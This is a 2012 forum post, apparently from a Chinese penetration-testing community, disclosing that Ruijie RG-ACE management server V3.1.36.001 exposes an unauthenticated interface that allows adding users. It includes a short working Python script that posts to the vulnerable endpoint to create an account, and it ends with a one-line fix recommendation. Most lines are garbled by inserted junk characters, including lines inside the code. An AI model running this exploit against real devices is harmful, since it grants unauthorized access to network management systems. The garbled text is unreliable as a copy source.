中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
9 N8 Y. v3 X; C% Y4 R6 l1 F. a- P0 {

: K# W; I/ D- s5 @测试的具体版本是
, _5 n6 K* W/ F. k+ a2 n产品名称: 锐捷应用控制引擎  @0 L2 x* R7 h! p- t+ p3 e
版本号: 3.1.36.001 TC- Y) s9 K& B" B' o( u
编译时间: 201104291730, V0 M  m/ H/ i  h0 I/ B9 S7 F
* z& V6 |& d6 x
$ l+ w% x& I+ ^! t0 R8 o1 s9 t4 S
漏洞证明:. h' H' h2 `2 a( W$ R, w8 ^$ h. ^

$ I# y" ~- U' a7 T! X9 F+ {
2 X& a* j+ g% @) s5 @$ p% W0 ^) }* Z

* Y  O* _% o5 Y8 N* \
$ F4 C9 ^7 D) e; y
) Q4 q0 X2 {' K' f执行脚本6 b) {7 T" i  W0 Q: p# P
#! /usr/bin/env python! h  [( U. s0 }
#coding=gbk
. [+ q4 V& `( s. G#RG-ACE管理服务器 V3.1.36.001
6 y5 c7 _$ s4 ^+ |. Zimport urllib2, urllib,cookielib
) S! ]* ?9 l* _: x) B* b% Aurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP6 y. T6 s  e! c$ J: H6 U' C
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
9 F' |! V( M4 H+ H/ Z8 \1 _) mopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]; h- p, B" {- X8 d( |
post=(("event","userManager.doInsertUserInfo"),
: H# J  F6 \: x, a+ M' {("useractionname","addButtonValue"),
1 n( s# l8 d6 M$ C8 W& o: U, N: ^("useropermanager","userManager"),
3 I* R* V; o  f& C! `# d9 @  i& s. u7 y("userName","t"), #######账号自己加9 T0 S/ G$ @( ~
("pwd","aaaaaa"),######密码自己加
" Y- z0 b5 O9 R, D0 @8 t("trueName","ad"),* A( U0 A: _$ I. o
("email",""),
5 J2 T# ?, _0 a9 `" ?("mobilePhone",""),
4 ]3 D, m; X# b("officePhone",""),' O( X6 i' a. d8 _( |, Q! I
("addr",""),0 S: v- T# l% H3 w5 Y
("submit","确定"))  l% V; |9 T% ?1 E5 Z
urllib2.install_opener(opener)
2 z6 g: Q# p) _8 K9 g# T% Z' Np=urllib2.urlopen(url, urllib.urlencode(post)).read()
# H/ v, y: P* aprint "Done"+ a# S7 c/ T+ ], H) J+ h  a$ i
9 [5 E4 k/ P( R5 N
登录,连接设备
- F' |7 j0 D% T, _4 K8 U* l  g3 A* f" q3 m% \

7 t2 E0 @, U$ y# z- c$ }
: o3 z% u% |- Y/ t& `
% R3 J- w( D% I; w0 n$ r9 |& `9 x7 z5 _; b) A; F* O
默认的管理员admin权限更大点, ~+ m1 i' X" T1 j, ]

% @0 }7 d9 c8 \3 U. S& e1 I' ?- N* B' K# G' G

3 y7 a% J/ ]$ L6 L% f; X
8 e" O4 D5 ?0 n& k" P1 Y& Y) E: h6 N$ J0 s% m
修复方案:
5 k( W$ I3 L8 f: x* g) H6 H0 M加强对接口的权限验证3 L$ N4 h' r4 z4 `
, q; r/ v. y0 c9 _2 j  a1 `/ ~3 G* o# Z





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2